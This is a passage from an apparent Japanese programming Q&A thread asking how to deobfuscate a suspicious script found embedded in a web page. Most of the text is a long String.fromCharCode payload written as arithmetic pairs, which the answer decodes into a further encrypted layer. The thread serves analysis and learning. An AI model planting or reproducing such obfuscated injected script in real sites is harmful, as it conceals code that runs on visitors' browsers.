97 - 2, 105 - 4, 112 - 2, 108 - 9, 46 - 6, 103 - 6, 124 - 8, 117 - 6, 101 - 3, 45 - 5, 106 - 5, 116 - 6, 106 - 7, 109 - 8, 103 - 3, 46 - 5, 47 - 3, 41 - 9, 115 - 8, 109 - 8, 126 - 5, 43 - 2, 61 - 2, 18 - 8, 46 - 6, 114 - 4, 108 - 7, 126 - 7, 39 - 7, 74 - 4, 125 - 8, 119 - 9, 108 - 9, 122 - 6, 114 - 9, 114 - 3, 111 - 1, 41 - 1, 104 - 4, 105 - 4, 104 - 5, 44 - 3, 47 - 6, 49 - 9, 45 - 4, 68 - 9, 14 - 4, 16 - 6)))();</script>
<!-- [ #container ] -->
<div id="container" class="innerBox">
<!-- [ #content ] -->
<div id="content">
```

それが難読化されているソースコードです。

質問１）　どのような内容なのか難読化を解除して教えてください。
質問２）　どのようなテクニックで難読化しているのか具体的に解説をお願いします。
質問３）　今後このようなJavascript難読化を解読するにはどのような勉強をすれば良いか教えてください。
質問４）　解読ツールのようなものがあれば教えてください。

以上よろしくお願いいたします。

Comment: Myaku様回答ありがとうございました。今回この掲示板を初めて使ったものですから間違えて操作してしまい、ダウンvote?の▼ボタンをうっかりと押してしまいました。申し訳ございません。慌てて▲アップvoteを押させて頂きましたが、ダウンvoteの取り消しというのは、どうすれば良いのでしょうか？本当に申し訳ございません。教えて頂いたというのに。
１）ところでさらに教えて頂きたいのですが
String.fromCharCode(19 - 9, 126 - 8, 100 - 3, 122 - 8, 37 - 5, 109 - 2, 、、、、、、、、、、　この部分を解読されて「var key = 'hhVryOyUnI';
var enced =、、、、、、、、、、、、、」と難読化を解読されていますが、この第一回目の解読は具体的には、どのような方法でなさったのですか？そこを少し教えていただけると勉強になります。

Answer (score 11):

まずソースコードが文字コード(Unicode)で記載されています。
記載された文字コード群を文字列に変換しているのが1つ目です。
`String.fromCharCode`

```js
document.getElementById("console").innerText=String.fromCharCode(19 - 9, 126 - 8, 100 - 3, 122 - 8, 37 - 5, 109 - 2, 104 - 3, 129 - 8, 36 - 4, 67 - 6, 34 - 2, 41 - 2, 106 - 2, 113 - 9, 94 - 8, 123 - 9, 123 - 2, 83 - 4, 130 - 9, 94 - 9, 112 - 2, 80 - 7, 43 - 4, 64 - 5, 15 - 5, 119 - 1, 104 - 7, 122 - 8, 38 - 6, 102 - 1, 111 - 1, 106 - 7, 108 - 7, 109 - 9, 35 - 3, 63 - 2, 41 - 9, 48 - 9, 85 - 4, 74 - 9, 60 - 8, 114 - 8, 76 - 4, 67 - 1, 119 - 8, 57 - 2, 78 - 9, 73 - 5, 118 - 7, 70 - 5, 100 - 3, 89 - 8, 111 - 4, 101 - 3, 86 - 9, 112 - 4, 113 - 1, 84 - 3, 106 - 8, 125 - 6, 76 - 2, 110 - 8, 89 - 5, 112 - 3, 115 - 8, 105 - 4, 68 - 1, 88 - 5, 83 - 1, 85 - 2, 71 - 3, 112 - 8, 74 - 9, 92 - 6, 80 - 1, 107 - 4, 53 - 5, 120 - 9, 80 - 8, 69 - 4, 72 - 3, 56 - 3, 81 - 9, 71 - 1, 117 - 9, 125 - 4, 96 - 9, 91 - 3, 81 - 8, 80 - 9, 81 - 1, 87 - 5, 123 - 4, 91 - 2, 102 - 4, 72 - 2, 51 - 2, 93 - 6, 86 - 7, 82 - 1, 71 - 6, 63 - 6, 78 - 7, 126 - 5, 123 - 7, 80 - 9, 76 - 9, 131 - 9, 114 - 7, 110 - 8, 92 - 6, 106 - 1, 128 - 9, 81 - 6, 78 - 4, 108 - 1, 75 - 6, 115 - 2, 72 - 1, 121 - 1, 122 - 6, 55 - 2, 94 - 8, 87 - 2, 83 - 9, 71 - 1, 91 - 4, 93 - 5, 91 - 6, 92 - 3, 83 - 8, 67 - 1, 117 - 5, 80 - 7, 86 - 8, 90 - 8, 49 - 1, 95 - 8, 76 - 2, 72 - 6, 70 - 5, 125 - 6, 93 - 9, 117 - 7, 86 - 4, 79 - 6, 87 - 3, 123 - 2, 64 - 8, 119 - 5, 78 - 9, 125 - 3, 57 - 9, 91 - 2, 91 - 2, 91 - 7, 59 - 7, 81 - 6, 68 - 1, 58 - 9, 70 - 5, 59 - 2, 75 - 3, 131 - 9, 116 - 1, 81 - 9, 81 - 9, 70 - 3, 93 - 4, 102 - 2, 107 - 6, 68 - 3, 75 - 6, 76 - 1, 104 - 5, 92 - 7, 109 - 1, 127 - 5, 85 - 3, 94 - 8, 114 - 6, 54 - 5, 74 - 7, 71 - 3, 127 - 8, 73 - 2, 73 - 6, 123 - 2, 82 - 9, 105 - 7, 76 - 6, 106 - 1, 73 - 3, 95 - 5, 82 - 8, 105 - 1, 112 - 1, 116 - 5, 77 - 6, 109 - 5, 129 - 9, 44 - 1, 88 - 1, 57 - 8, 112 - 5, 56 - 8, 102 - 3, 56 - 5, 94 - 8, 82 - 3, 100 - 3, 89 - 4, 104 - 1, 105 - 4, 82 - 4, 122 - 3, 68 - 2, 97 - 7, 77 - 1, 67 - 1, 93 - 4, 62 - 8, 68 - 2, 90 - 7, 73 - 8, 80 - 2, 74 - 3, 60 - 9, 98 - 8, 84 - 4, 88 - 1, 88 - 5, 118 - 3, 95 - 8, 79 - 1, 111 - 7, 121 - 6, 109 - 2, 77 - 9, 87 - 6, 96 - 7, 106 - 1, 94 - 6, 74 - 8, 116 - 5, 109 - 6, 75 - 5, 113 - 7, 58 - 6, 77 - 5, 84 - 8, 70 - 1, 108 - 5, 89 - 4, 76 - 1, 114 - 6, 78 - 4, 105 - 4, 104 - 7, 77 - 8, 81 - 7, 106 - 4, 88 - 4, 110 - 1, 109 - 1, 80 - 7, 86 - 3, 70 - 2, 63 - 7, 89 - 4, 92 - 5, 89 - 2, 107 - 8, 106 - 9, 82 - 3, 105 - 2, 72 - 3, 113 - 8, 70 - 5, 85 - 4, 49 - 1, 109 - 1, 94 - 6, 69 - 3, 69 - 4, 107 - 3, 80 - 8, 87 - 3, 68 - 3, 95 - 8, 73 - 7, 112 - 9, 62 - 9, 68 - 3, 85 - 7, 86 - 4, 53 - 5, 89 - 2, 83 - 9, 68 - 2, 68 - 3, 120 - 1, 85 - 3, 54 - 4, 114 - 6, 79 - 5, 92 - 6, 96 - 9, 124 - 8, 91 - 8, 88 - 2, 81 - 9, 60 - 7, 87 - 6, 106 - 6, 88 - 6, 91 - 5, 72 - 4, 84 - 1, 77 - 8, 109 - 5, 59 - 9, 93 - 8, 111 - 3, 109 - 1, 125 - 7, 72 - 5, 123 - 1, 70 - 5, 101 - 4, 85 - 5, 74 - 8, 119 - 8, 74 - 3, 107 - 9, 90 - 2, 113 - 9, 96 - 6, 102 - 4, 54 - 5, 110 - 2, 54 - 5, 74 - 5, 55 - 7, 83 - 5, 77 - 4, 84 - 1, 77 - 5, 93 - 3, 84 - 1, 73 - 4, 74 - 7, 111 - 3, 92 - 2, 107 - 5, 87 - 6, 55 - 7, 110 - 1, 69 - 3, 121 - 2, 86 - 9, 53 - 6, 73 - 3, 120 - 1, 114 - 2, 109 - 5, 78 - 9, 70 - 2, 119 - 4, 77 - 2, 85 - 9, 68 - 2, 71 - 6, 118 - 8, 78 - 1, 72 - 2, 116 - 4, 110 - 9, 82 - 3, 66 - 1, 116 - 8, 55 - 3, 76 - 4, 91 - 8, 122 - 3, 104 - 5, 81 - 9, 73 - 5, 58 - 2, 107 - 8, 75 - 3, 111 - 5, 123 - 3, 108 - 7, 103 - 1, 76 - 7, 54 - 1, 116 - 5, 88 - 2, 91 - 5, 90 - 4, 52 - 2, 93 - 5, 53 - 5, 113 - 9, 114 - 5, 88 - 1, 91 - 8, 59 - 6, 112 - 5, 100 - 3, 89 - 4, 113 - 9, 80 - 7, 104 - 4, 113 - 5, 75 - 1, 98 - 8, 85 - 5, 86 - 4, 121 - 2, 105 - 1, 75 - 4, 131 - 9, 121 - 6, 77 - 6, 89 - 4, 50 - 1, 122 - 2, 87 - 4, 92 - 5, 88 - 1, 60 - 3, 92 - 2, 81 - 6, 78 - 7, 89 - 7, 117 - 5, 87 - 4, 73 - 4, 112 - 8, 55 - 5, 75 - 4, 123 - 3, 60 - 3, 123 - 5, 86 - 1, 88 - 4, 115 - 8, 72 - 6, 82 - 7, 107 - 4, 115 - 8, 74 - 5, 74 - 8, 89 - 8, 96 - 7, 92 - 5, 85 - 5, 89 - 7, 108 - 5, 124 - 3, 71 - 4, 58 - 8, 105 - 6, 87 - 7, 70 - 2, 85 - 2, 77 - 4, 56 - 1, 77 - 9, 87 - 4, 116 - 5, 93 - 8, 109 - 7, 85 - 4, 55 - 7, 112 - 3, 75 - 9, 127 - 8, 79 - 2, 48 - 1, 73 - 3, 55 - 6, 68 - 2, 122 - 4, 83 - 1, 77 - 6, 108 - 4, 87 - 3, 102 - 5, 88 - 3, 64 - 7, 93 - 3, 108 - 9, 90 - 4, 122 - 6, 93 - 3, 80 - 2, 77 - 5, 84 - 6, 52 - 3, 89 - 5, 110 - 1, 116 - 8, 76 - 3, 88 - 5, 73 - 1, 97 - 8, 71 - 6, 76 - 4, 75 - 7, 123 - 8, 84 - 7, 78 - 4, 124 - 5, 71 - 5, 129 - 8, 91 - 2, 108 - 1, 107 - 3, 54 - 4, 92 - 7, 111 - 3, 113 - 6, 130 - 9, 102 - 3, 60 - 9, 94 - 8, 88 - 9, 104 - 7, 87 - 2, 104 - 1, 103 - 2, 82 - 4, 123 - 4, 67 - 1, 94 - 4, 82 - 3, 111 - 7, 109 - 6, 123 - 2, 71 - 4, 127 - 6, 106 - 7, 106 - 7, 88 - 5, 77 - 6, 120 - 4, 87 - 4, 75 - 5, 130 - 9, 53 - 1, 87 - 7, 87 - 7, 67 - 2, 114 - 7, 116 - 5, 74 - 2, 68 - 3, 100 - 1, 113 - 6, 93 - 5, 68 - 3, 127 - 8, 61 - 5, 81 - 9, 73 - 6, 102 - 3, 125 - 7, 77 - 1, 109 - 6, 52 - 4, 79 - 8, 81 - 8, 108 - 1, 112 - 4, 130 - 8, 102 - 4, 52 - 3, 117 - 9, 53 - 4, 85 - 1, 114 - 9, 72 - 7, 82 - 3, 90 - 7, 76 - 4, 55 - 2, 93 - 9, 71 - 3, 68 - 1, 54 - 2, 108 - 7, 82 - 5, 69 - 4, 66 - 1, 66 - 9, 87 - 6, 92 - 7, 111 - 8, 118 - 2, 102 - 1, 79 - 9, 117 - 9, 124 - 6, 94 - 7, 91 - 3, 87 - 1, 85 - 6, 102 - 5, 88 - 6, 113 - 2, 80 - 2, 74 - 1, 112 - 9, 104 - 5, 84 - 8, 77 - 4, 89 - 4, 79 - 5, 108 - 6, 85 - 1, 113 - 4, 114 - 6, 74 - 1, 90 - 7, 75 - 8, 120 - 4, 60 - 8, 106 - 7, 52 - 2, 61 - 4, 93 - 3, 107 - 7, 88 - 3, 57 - 5, 61 - 5, 74 - 7, 88 - 7, 58 - 2, 130 - 8, 74 - 2, 66 - 1, 56 - 7, 124 - 6, 88 - 6, 78 - 6, 92 - 7, 105 - 7, 83 - 8, 67 - 2, 65 - 9, 80 - 2, 82 - 3, 74 - 9, 99 - 9, 90 - 2, 80 - 1, 121 - 1, 96 - 7, 91 - 1, 68 - 3, 92 - 8, 60 - 8, 79 - 1, 73 - 2, 110 - 6, 93 - 8, 86 - 2, 71 - 4, 112 - 7, 119 - 7, 91 - 9, 109 - 7, 75 - 5, 92 - 6, 76 - 8, 89 - 6, 78 - 9, 113 - 9, 58 - 8, 88 - 3, 111 - 7, 66 - 1, 113 - 1, 94 - 7, 92 - 4, 49 - 1, 107 - 9, 78 - 3, 68 - 3, 60 - 4, 87 - 9, 87 - 8, 69 - 4, 91 - 1, 97 - 9, 77 - 3, 113 - 9, 104 - 5, 124 - 4, 76 - 9, 123 - 1, 70 - 1, 119 - 9, 76 - 8, 116 - 6, 59 - 6, 93 - 7, 79 - 7, 107 - 2, 66 - 1, 91 - 4, 82 - 5, 104 - 1, 82 - 9, 118 - 3, 92 - 8, 51 - 3, 77 - 7, 51 - 1, 87 - 2, 49 - 1, 85 - 3, 128 - 7, 91 - 4, 91 - 3, 111 - 7, 108 - 6, 87 - 6, 51 - 3, 109 - 5, 78 - 5, 109 - 9, 115 - 7, 83 - 9, 94 - 4, 99 - 1, 50 - 1, 110 - 2, 54 - 5, 76 - 7, 115 - 9, 88 - 2, 78 - 5, 73 - 1, 86 - 2, 101 - 2, 89 - 3, 73 - 1, 71 - 4, 72 - 3, 79 - 1, 107 - 6, 121 - 2, 105 - 6, 114 - 4, 77 - 9, 73 - 8, 50 - 2, 122 - 5, 81 - 1, 88 - 6, 62 - 5, 115 - 5, 96 - 8, 109 - 3, 107 - 8, 68 - 2, 85 - 5, 86 - 1, 61 - 4, 67 - 1, 106 - 6, 116 - 8, 83 - 5, 74 - 5, 100 - 1, 110 - 2, 115 - 7, 54 - 2, 97 - 9, 49 - 1, 83 - 5, 74 - 1, 87 - 4, 78 - 6, 97 - 7, 88 - 5, 89 - 2, 94 - 7, 64 - 7, 95 - 5, 107 - 7, 85 - 3, 74 - 1, 58 - 9, 85 - 2, 73 - 7, 49 - 1, 58 - 7, 77 - 7, 90 - 8, 123 - 4, 106 - 2, 75 - 7, 89 - 1, 116 - 1, 78 - 6, 78 - 4, 123 - 4, 120 - 1, 79 - 1, 82 - 6, 112 - 6, 49 - 1, 109 - 7, 95 - 5, 57 - 8, 57 - 5, 56 - 6, 75 - 3, 72 - 5, 111 - 8, 108 - 6, 73 - 7, 75 - 3, 75 - 5, 99 - 1, 94 - 7, 91 - 4, 56 - 3, 77 - 8, 103 - 6, 74 - 5, 55 - 2, 115 - 8, 96 - 9, 91 - 4, 82 - 8, 56 - 6, 93 - 8, 116 - 8, 116 - 8, 123 - 5, 92 - 5, 93 - 5, 95 - 9, 80 - 1, 101 - 4, 83 - 1, 85 - 4, 94 - 9, 106 - 6, 108 - 5, 104 - 5, 97 - 8, 79 - 4, 72 - 6, 120 - 1, 62 - 7, 80 - 9, 113 - 4, 102 - 3, 71 - 5, 74 - 8, 112 - 6, 82 - 9, 92 - 4, 69 - 4, 84 - 3, 73 - 8, 104 - 2, 105 - 3, 88 - 3, 111 - 4, 119 - 5, 66 - 1, 84 - 3, 97 - 8, 128 - 8, 88 - 2, 92 - 6, 71 - 5, 127 - 9, 88 - 1, 72 - 1, 111 - 7, 87 - 3, 100 - 3, 87 - 2, 89 - 3, 94 - 4, 91 - 3, 77 - 7, 79 - 5, 98 - 8, 106 - 8, 53 - 4, 112 - 4, 52 - 3, 85 - 1, 110 - 1, 116 - 8, 80 - 7, 76 - 6, 72 - 5, 118 - 6, 88 - 5, 77 - 9, 68 - 1, 56 - 4, 102 - 1, 84 - 7, 72 - 7, 72 - 7, 61 - 4, 84 - 2, 108 - 5, 72 - 3, 53 - 1, 79 - 9, 113 - 9, 120 - 1, 56 - 5, 86 - 8, 110 - 4, 83 - 5, 72 - 1, 105 - 7, 107 - 3, 76 - 7, 76 - 2, 86 - 6, 108 - 4, 50 - 2, 95 - 8, 101 - 4, 78 - 8, 69 - 3, 58 - 9, 85 - 1, 52 - 1, 90 - 8, 89 - 3, 88 - 5, 74 - 2, 120 - 4, 75 - 7, 89 - 4, 75 - 4, 65 - 9, 76 - 9, 91 - 3, 49 - 1, 56 - 3, 119 - 7, 88 - 5, 74 - 5, 105 - 1, 51 - 1, 87 - 2, 110 - 7, 123 - 8, 114 - 1, 69 - 1, 85 - 2, 73 - 8, 101 - 2, 81 - 7, 52 - 3, 82 - 4, 110 - 5, 101 - 1, 111 - 3, 76 - 2, 91 - 1, 105 - 7, 121 - 2, 87 - 5, 109 - 7, 93 - 3, 72 - 1, 117 - 9, 78 - 5, 89 - 6, 78 - 6, 96 - 7, 73 - 7, 80 - 8, 73 - 5, 123 - 8, 120 - 4, 83 - 3, 72 - 7, 78 - 1, 122 - 7, 70 - 4, 129 - 9, 52 - 4, 106 - 1, 92 - 5, 105 - 1, 63 - 7, 59 - 5, 71 - 1, 124 - 2, 97 - 8, 99 - 2, 82 - 9, 68 - 3, 100 - 1, 78 - 7, 105 - 3, 112 - 4, 119 - 3, 91 - 1, 84 - 6, 76 - 4, 86 - 8, 58 - 9, 91 - 7, 113 - 4, 117 - 9, 77 - 4, 91 - 8, 80 - 8, 90 - 1, 67 - 1, 75 - 3, 72 - 4, 122 - 7, 62 - 8, 87 - 8, 110 - 7, 78 - 9, 111 - 6, 69 - 4, 85 - 4, 51 - 2, 49 - 6, 77 - 8, 83 - 1, 98 - 9, 107 - 4, 71 - 2, 113 - 7, 125 - 6, 80 - 4, 94 - 4, 92 - 7, 113 - 9, 84 - 4, 93 - 3, 51 - 3, 73 - 7, 81 - 6, 106 - 9, 76 - 6, 89 - 3, 54 - 5, 88 - 1, 89 - 1, 120 - 8, 95 - 6, 85 - 4, 96 - 9, 54 - 5, 60 - 8, 94 - 7, 94 - 7, 66 - 9, 95 - 5, 106 - 6, 93 - 8, 59 - 6, 118 - 6, 68 - 2, 67 - 2, 106 - 7, 53 - 4, 73 - 4, 127 - 7, 91 - 6, 103 - 4, 76 - 8, 91 - 7, 117 - 6, 101 - 2, 77 - 2, 72 - 7, 60 - 4, 85 - 7, 104 - 3, 74 - 9, 75 - 6, 108 - 9, 82 - 3, 130 - 8, 72 - 7, 107 - 3, 76 - 9, 129 - 8, 84 - 2, 73 - 8, 74 - 7, 123 - 1, 108 - 1, 105 - 5, 75 - 6, 107 - 2, 98 - 9, 106 - 7, 104 - 3, 88 - 3, 61 - 8, 121 - 4, 90 - 3, 91 - 6, 59 - 2, 48 - 1, 88 - 5, 95 - 7, 85 - 7, 126 - 8, 92 - 5, 89 - 1, 88 - 2, 87 - 8, 102 - 5, 94 - 9, 111 - 8, 105 - 3, 86 - 6, 128 - 8, 121 - 2, 105 - 5, 78 - 5, 67 - 2, 55 - 2, 63 - 8, 74 - 9, 111 - 6, 91 - 2, 78 - 2, 68 - 1, 87 - 4, 74 - 1, 103 - 5, 79 - 9, 106 - 1, 78 - 8, 95 - 5, 99 - 2, 76 - 7, 61 - 9, 45 - 2, 86 - 8, 122 - 3, 85 - 4, 61 - 8, 75 - 6, 89 - 7, 111 - 8, 59 - 4, 70 - 1, 74 - 6, 117 - 6, 71 - 6, 106 - 7, 117 - 8, 77 - 3, 82 - 9, 102 - 2, 114 - 6, 81 - 7, 95 - 5, 80 - 3, 112 - 4, 94 - 8, 53 - 4, 93 - 5, 76 - 4, 116 - 8, 80 - 7, 88 - 7, 117 - 7, 96 - 6, 74 - 6, 86 - 3, 93 - 5, 60 - 3, 77 - 3, 109 - 7, 72 - 2, 95 - 9, 72 - 4, 92 - 9, 71 - 2, 112 - 9, 115 - 1, 107 - 6, 76 - 6, 112 - 4, 127 - 9, 81 - 9, 129 - 8, 70 - 5, 69 - 4, 81 - 6, 105 - 1, 123 - 4, 71 - 5, 83 - 4, 86 - 4, 128 - 8, 92 - 2, 84 - 4, 70 - 4, 125 - 6, 106 - 2, 82 - 6, 88 - 5, 97 - 8, 73 - 1, 67 - 2, 124 - 2, 61 - 5, 96 - 8, 86 - 1, 89 - 6, 127 - 8, 112 - 3, 85 - 6, 127 - 8, 60 - 4, 111 - 4, 74 - 6, 88 - 3, 83 - 1, 54 - 4, 75 - 9, 75 - 9, 109 - 6, 114 - 8, 74 - 6, 69 - 1, 69 - 3, 71 - 4, 101 - 4, 85 - 4, 54 - 6, 90 - 9, 84 - 7, 106 - 2, 82 - 5, 74 - 9, 89 - 9, 76 - 6, 70 - 4, 54 - 5, 74 - 4, 92 - 7, 81 - 3, 75 - 2, 86 - 3, 77 - 5, 96 - 6, 85 - 2, 73 - 5, 125 - 4, 57 - 5, 81 - 5, 105 - 5, 84 - 3, 117 - 2, 121 - 1, 77 - 9, 67 - 2, 112 - 5, 106 - 1, 74 - 4, 54 - 5, 116 - 8, 130 - 9, 93 - 6, 91 - 7, 117 - 2, 82 - 6, 88 - 8, 115 - 8, 111 - 8, 121 - 6, 85 - 7, 120 - 1, 95 - 6, 105 - 6, 97 - 7, 53 - 4, 75 - 9, 125 - 8, 96 - 6, 77 - 6, 110 - 2, 78 - 5, 89 - 6, 78 - 6, 93 - 4, 94 - 6, 68 - 3, 87 - 4, 123 - 8, 97 - 8, 80 - 7, 88 - 7, 120 - 4, 113 - 3, 80 - 9, 125 - 6, 52 - 4, 112 - 7, 84 - 6, 111 - 7, 109 - 6, 60 - 5, 79 - 7, 79 - 7, 55 - 7, 79 - 3, 83 - 6, 89 - 8, 121 - 2, 83 - 9, 74 - 1, 112 - 8, 103 - 3, 95 - 7, 82 - 7, 73 - 7, 126 - 7, 107 - 3, 80 - 5, 114 - 9, 104 - 1, 104 - 5, 71 - 3, 90 - 2, 61 - 8, 100 - 2, 92 - 5, 88 - 1, 91 - 9, 94 - 4, 80 - 3, 72 - 6, 94 - 5, 120 - 4, 76 - 9, 90 - 8, 75 - 6, 116 - 8, 95 - 8, 53 - 5, 82 - 8, 71 - 1, 88 - 1, 95 - 7, 90 - 4, 82 - 3, 98 - 1, 86 - 4, 53 - 1, 80 - 6, 79 - 5, 78 - 8, 74 - 1, 99 - 2, 74 - 5, 67 - 2, 65 - 9, 56 - 8, 73 - 8, 108 - 2, 125 - 6, 85 - 7, 85 - 2, 75 - 4, 123 - 7, 91 - 8, 74 - 2, 76 - 8, 126 - 7, 100 - 3, 82 - 4, 73 - 7, 54 - 2, 119 - 4, 82 - 1, 73 - 7, 59 - 7, 52 - 1, 78 - 6, 106 - 3, 124 - 5, 117 - 4, 93 - 8, 77 - 5, 92 - 6, 73 - 3, 102 - 5, 89 - 4, 74 - 8, 67 - 2, 81 - 4, 121 - 2, 119 - 8, 109 - 9, 79 - 3, 108 - 5, 69 - 4, 112 - 3, 89 - 5, 112 - 2, 88 - 6, 93 - 7, 92 - 9, 71 - 3, 106 - 3, 80 - 8, 71 - 1, 86 - 3, 84 - 6, 88 - 7, 105 - 5, 95 - 9, 71 - 1, 120 - 8, 86 - 2, 56 - 8, 65 - 8, 55 - 5, 89 - 6, 75 - 5, 110 - 2, 116 - 5, 90 - 9, 119 - 9, 93 - 8, 78 - 2, 84 - 7, 86 - 4, 108 - 5, 74 - 8, 76 - 2, 73 - 7, 102 - 3, 79 - 4, 101 - 2, 117 - 9, 56 - 3, 58 - 9, 85 - 3, 90 - 3, 110 - 3, 81 - 3, 77 - 8, 71 - 3, 78 - 5, 86 - 2, 72 - 4, 85 - 2, 119 - 7, 93 - 5, 77 - 4, 90 - 9, 70 - 1, 103 - 4, 89 - 9, 69 - 2, 120 - 5, 79 - 9, 75 - 9, 107 - 4, 124 - 9, 110 - 1, 76 - 6, 131 - 9, 75 - 1, 73 - 2, 90 - 1, 71 - 2, 73 - 3, 90 - 6, 93 - 5, 73 - 3, 77 - 3, 99 - 9, 101 - 3, 58 - 9, 109 - 2, 122 - 2, 66 - 1, 87 - 4, 119 - 8, 107 - 7, 74 - 8, 86 - 2, 81 - 4, 100 - 1, 76 - 8, 92 - 5, 77 - 8, 104 - 7, 84 - 5, 108 - 5, 73 - 4, 106 - 1, 73 - 8, 86 - 5, 53 - 4, 55 - 5, 85 - 1, 57 - 8, 112 - 5, 122 - 7, 83 - 9, 110 - 4, 124 - 9, 85 - 5, 76 - 2, 71 - 6, 56 - 7, 82 - 9, 106 - 4, 92 - 6, 82 - 8, 104 - 3, 102 - 3, 110 - 2, 62 - 9, 57 - 8, 83 - 1, 92 - 5, 109 - 2, 83 - 7, 83 - 5, 127 - 6, 67 - 2, 91 - 7, 77 - 7, 92 - 8, 113 - 2, 105 - 6, 106 - 8, 116 - 7, 91 - 9, 118 - 6, 86 - 3, 69 - 3, 93 - 7, 104 - 5, 110 - 9, 71 - 1, 116 - 8, 121 - 3, 69 - 1, 127 - 5, 82 - 1, 104 - 5, 98 - 1, 91 - 9, 112 - 1, 80 - 2, 82 - 4, 124 - 4, 91 - 2, 72 - 7, 76 - 4, 74 - 9, 52 - 4, 49 - 1, 74 - 3, 111 - 6, 126 - 7, 122 - 8, 74 - 9, 69 - 1, 78 - 1, 84 - 2, 75 - 6, 108 - 5, 97 - 8, 94 - 6, 76 - 3, 88 - 7, 122 - 7, 56 - 1, 77 - 5, 108 - 5, 109 - 2, 61 - 7, 89 - 4, 108 - 1, 90 - 8, 122 - 4, 70 - 3, 111 - 5, 67 - 2, 98 - 1, 71 - 6, 70 - 5, 97 - 8, 108 - 9, 82 - 5, 126 - 7, 72 - 7, 84 - 4, 79 - 3, 110 - 6, 92 - 6, 61 - 4, 69 - 2, 70 - 2, 125 - 6, 77 - 6, 68 - 1, 126 - 5, 77 - 4, 107 - 9, 74 - 4, 109 - 4, 79 - 9, 89 - 7, 109 - 7, 74 - 5, 57 - 5, 127 - 6, 92 - 3, 114 - 7, 106 - 2, 54 - 4, 94 - 9, 117 - 9, 112 - 5, 110 - 1, 77 - 5, 54 - 3, 91 - 5, 76 - 5, 84 - 8, 82 - 1, 107 - 8, 78 - 2, 78 - 5, 126 - 6, 59 - 3, 104 - 5, 77 - 4, 83 - 2, 50 - 1, 57 - 2, 81 - 9, 69 - 2, 127 - 8, 78 - 4, 72 - 4, 73 - 6, 65 - 9, 109 - 5, 75 - 7, 92 - 9, 56 - 4, 80 - 2, 78 - 1, 76 - 7, 58 - 5, 56 - 8, 95 - 9, 88 - 2, 95 - 9, 51 - 1, 91 - 5, 90 - 8, 116 - 5, 104 - 1, 75 - 5, 76 - 9, 93 - 8, 69 - 2, 85 - 9, 73 - 7, 125 - 6, 80 - 2, 101 - 2, 93 - 5, 105 - 1, 96 - 6, 99 - 1, 50 - 1, 110 - 2, 58 - 9, 93 - 9, 116 - 7, 112 - 4, 79 - 6, 92 - 9, 69 - 2, 114 - 3, 83 - 4, 93 - 6, 87 - 4, 123 - 8, 94 - 7, 80 - 2, 111 - 7, 123 - 8, 114 - 7, 76 - 8, 87 - 6, 91 - 2, 107 - 2, 96 - 8, 70 - 5, 117 - 2, 120 - 7, 73 - 2, 73 - 5, 76 - 7, 94 - 6, 80 - 9, 105 - 1, 123 - 4, 83 - 9, 79 - 6, 110 - 6, 106 - 6, 98 - 8, 105 - 6, 114 - 7, 84 - 2, 56 - 7, 85 - 2, 84 - 1, 67 - 2, 79 - 8, 73 - 1, 73 - 5, 78 - 1, 74 - 9, 78 - 7, 68 - 1, 128 - 9, 82 - 4, 86 - 6, 69 - 3, 106 - 3, 124 - 9, 87 - 3, 50 - 2, 77 - 7, 56 - 6, 75 - 8, 90 - 2, 84 - 6, 121 - 3, 93 - 6, 91 - 3, 87 - 1, 80 - 1, 103 - 6, 93 - 8, 107 - 4, 80 - 4, 80 - 1, 105 - 1, 102 - 3, 93 - 4, 86 - 6, 93 - 9, 74 - 9, 57 - 2, 78 - 7, 109 - 4, 127 - 8, 98 - 1, 75 - 3, 115 - 9, 101 - 2, 110 - 9, 94 - 9, 87 - 3, 52 - 4, 106 - 7, 82 - 4, 71 - 6, 117 - 6, 125 - 6, 80 - 1, 121 - 1, 121 - 2, 59 - 8, 72 - 6, 105 - 1, 124 - 5, 86 - 9, 77 - 8, 91 - 7, 73 - 8, 80 - 2, 81 - 8, 109 - 4, 75 - 6, 79 - 8, 81 - 8, 112 - 8, 105 - 6, 82 - 6, 81 - 2, 89 - 7, 109 - 6, 61 - 8, 89 - 7, 59 - 8, 82 - 8, 107 - 2, 88 - 5, 76 - 4, 99 - 9, 92 - 9, 92 - 5, 92 - 5, 66 - 9, 96 - 6, 76 - 2, 111 - 7, 112 - 1, 116 - 5, 77 - 6, 111 - 7, 124 - 4, 52 - 9, 94 - 7, 55 - 7, 83 - 9, 73 - 3, 93 - 6, 89 - 1, 92 - 6, 87 - 8, 99 - 2, 90 - 8, 95 - 9, 113 - 8, 107 - 7, 114 - 6, 80 - 7, 70 - 1, 95 - 6, 58 - 9, 110 - 2, 115 - 8, 96 - 8, 114 - 5, 70 - 4, 88 - 4, 92 - 3, 116 - 8, 128 - 9, 83 - 3, 92 - 7, 96 - 9, 97 - 7, 87 - 6, 106 - 8, 111 - 2, 86 - 4, 70 - 2, 41 - 2, 61 - 2, 11 - 1, 108 - 6, 119 - 2, 117 - 7, 103 - 4, 117 - 1, 112 - 7, 113 - 2, 116 - 6, 33 - 1, 128 - 8, 114 - 3, 115 - 1, 102 - 7, 103 - 2, 113 - 3, 101 - 2, 49 - 9, 120 - 5, 117 - 1, 123 - 9, 110 - 5, 114 - 4, 109 - 6, 49 - 5, 41 - 9, 115 - 8, 107 - 6, 122 - 1, 49 - 8, 33 - 1, 131 - 8, 16 - 6, 41 - 9, 33 - 1, 123 - 5, 101 - 4, 115 - 1, 35 - 3, 117 - 3, 102 - 1, 118 - 3, 38 - 6, 62 - 1, 35 - 3, 48 - 9, 42 - 3, 67 - 8, 17 - 7, 34 - 2, 38 - 6, 109 - 7, 112 - 1, 116 - 2, 33 - 1, 44 - 4, 119 - 1, 100 - 3, 115 - 1, 36 - 4, 112 - 7, 40 - 8, 64 - 3, 41 - 9, 51 - 3, 63 - 4, 39 - 7, 108 - 3, 40 - 8, 63 - 3, 35 - 3, 119 - 4, 121 - 5, 123 - 9, 113 - 8, 113 - 3, 106 - 3, 47 - 1, 115 - 7, 108 - 7, 116 - 6, 110 - 7, 124 - 8, 107 - 3, 66 - 7, 34 - 2, 109 - 4, 46 - 3, 51 - 8, 43 - 2, 37 - 5, 127 - 4, 13 - 3, 41 - 9, 33 - 1, 33 - 1, 36 - 4, 118 - 4, 104 - 3, 120 - 5, 39 - 7, 52 - 9, 63 - 2, 37 - 5, 88 - 5, 124 - 8, 121 - 7, 111 - 6, 119 - 9, 109 - 6, 53 - 7, 105 - 3, 123 - 9, 117 - 6, 112 - 3, 72 - 5, 111 - 7, 105 - 8, 116 - 2, 71 - 4, 120 - 9, 105 - 5, 103 - 2, 